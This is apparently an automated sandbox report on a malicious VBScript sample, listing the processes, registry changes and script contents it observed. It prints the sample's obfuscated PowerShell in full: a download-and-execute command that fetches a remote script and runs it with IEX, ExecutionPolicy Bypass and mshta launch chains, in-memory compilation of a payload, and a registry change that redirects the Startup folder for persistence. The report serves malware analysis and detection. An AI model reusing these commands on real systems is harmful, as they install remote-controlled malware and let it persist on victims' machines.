Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_071F7038 27_2_071F7038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_071F7858 27_2_071F7858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_071F7849 27_2_071F7849
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07242590 27_2_07242590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07245B00 27_2_07245B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07247368 27_2_07247368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_0724A211 27_2_0724A211
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07244AE1 27_2_07244AE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_0724B9D0 27_2_0724B9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_0724AF30 27_2_0724AF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07243FC8 27_2_07243FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_072411C8 27_2_072411C8
PE file does not import any functions
Source: vfl4qio1.dll.25.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: KDH32783JHC73287SDF87.VBS Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\KDH32783JHC73287SDF87.VBS'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Music\vb.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass & 'C:\Users\Public\Service.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF057.tmp' 'c:\Users\user\AppData\Local\Temp\vfl4qio1\CSC646E655CB52D4766BD87DD83F0456ED1.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Music\vb.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' ' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass & 'C:\Users\Public\Service.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF057.tmp' 'c:\Users\user\AppData\Local\Temp\vfl4qio1\CSC646E655CB52D4766BD87DD83F0456ED1.TMP'
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210925 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zjx0icl.5k2.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@34/34@4/4
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: 27.2.RegAsm.exe.400000.0.unpack, Client/Settings.cs Base64 encoded string: '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
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\KDH32783JHC73287SDF87.VBS'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)$H1 = New-Object Byte[](30720)$jtwC.Read($H1, 0, 30720) | Out-Null[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($H1).'EntryPoint'.Invoke($Null,$Null))[Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$H1)[System.Threading.Thread]::Sleep(1000)return $T.GetMethod('Run').Invoke($null, $Params)} catch { }Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\ServiceState\";Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\ServiceState\";start-sleep 7Start-Process -FilePath C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="3.0"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPane
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,220,189,121,124,92,197,149,54,92,125,123,85,107,109,237,146,37,91,182,177,105,219,88,214,98,201,146,193,198,90,109,217,150,37,75,178,44,57,78,76,91,106,73,45,181,250,74,221,45,219,50,155,229,64,6,146,176,133,201,2,217,88,146,201,54,153,132,236,188,217,32,16,72,2,73,128,33,201,64,240,132,76,2,3,153,108,204,48,147,61,188,207,115,234,246,34,201,16,230,253,253,190,127,62,67,215,173,83,203,169,83,167,78,157,237,182,164,238,35,55,43,187,82,202,129,207,43,175,40,245,37,165,255,237,82,127,251,223,25,124,114,86,253,159,28,245,185,140,239,174,254,146,109,255,119,87,15,76,132,98,85,51,81,115,60,26,152,174,26,9,68,34,102,188,234,120,176,42,58,23,169,10,69,170,218,123,250,171,166,205,209,96,117,118,182,247,2,11,71,111,135,82,251,109,118,181,246,230,47,190,41,129,247,89,101,216,50,109,30,165,62,10,192,171,219,170,31,70,81,37,157,154,58,214,13,77,183,82,169,167,170,178,73,187,146,238,93,215,42,149,39,255,167,158,201,135,252,123,230,33,165,122,244,162,234,21,247,249,118,105,83,89,175,131,23,203,254,129,62,79,26,232,1,188,39,13,174,142,7,79,197,241,220,250,17,61,86,246,106,44,67,113,89,117,52,22,29,81,22,109,207,42,141,244,227,139,199,237,194,255,213,209,96,216,196,192,44,139,102,193,245,153,101,227,90,151,146,153,247,176,126,238,145,229,157,234,207,195,88,38,172,68,38,128,197,245,186,246,154,246,239,235,255,177,114,240,79,223,125,247,197,159,41,51,46,168,249,240,169,54,181,99,176,253,137,149,199,239,125,242,165,51,255,254,252,3,205,45,213,106,139
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' '
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: KDH32783JHC73287SDF87.VBS Static file information: File size 1327456 > 1048576
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
